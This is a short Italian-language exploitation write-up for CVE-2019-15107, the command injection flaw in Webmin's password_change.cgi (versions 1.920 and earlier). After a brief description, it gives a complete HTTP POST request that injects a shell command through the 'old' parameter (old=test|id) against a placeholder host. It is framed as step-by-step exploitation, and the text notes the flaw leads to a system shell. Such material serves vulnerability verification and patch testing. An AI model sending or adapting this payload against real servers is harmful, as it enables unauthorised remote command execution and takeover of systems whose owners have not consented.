CVE-2019-15107: Moduli di Exploit Disponibili per la Vulnerabilità di Esecuzione Remota di Codice in Webmin
- Descrizione della vulnerabilità
Webmin è un potente strumento di amministrazione di sistema basato sul Web, ampiamente utilizzato nei sistemi Unix. Durante l'elaborazione delle richieste in Password_Change.cgi di Webmin, il parametro 'old' presenta una vulnerabilità di injection di comandi che può essere sfruttata malevolmente. Quando l'utente abilita la funzione di reimpostazione della password di Webmin, un attaccante può sfruttare questa vulnerabilità per eseguire comandi arbitrari sul sistema vulnerabile e ottenere così una shell di sistema.
Versioni interessate:
Webmin 1.920 e versioni precedenti
- Sfruttamento della vulnerabilità
Metodo 1: Rilevamento manuale
Accedi alla pagina, ignora il certificato e potrai vedere la pagina di login di Webmin

Invia il seguente pacchetto dati per eseguire il comando id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2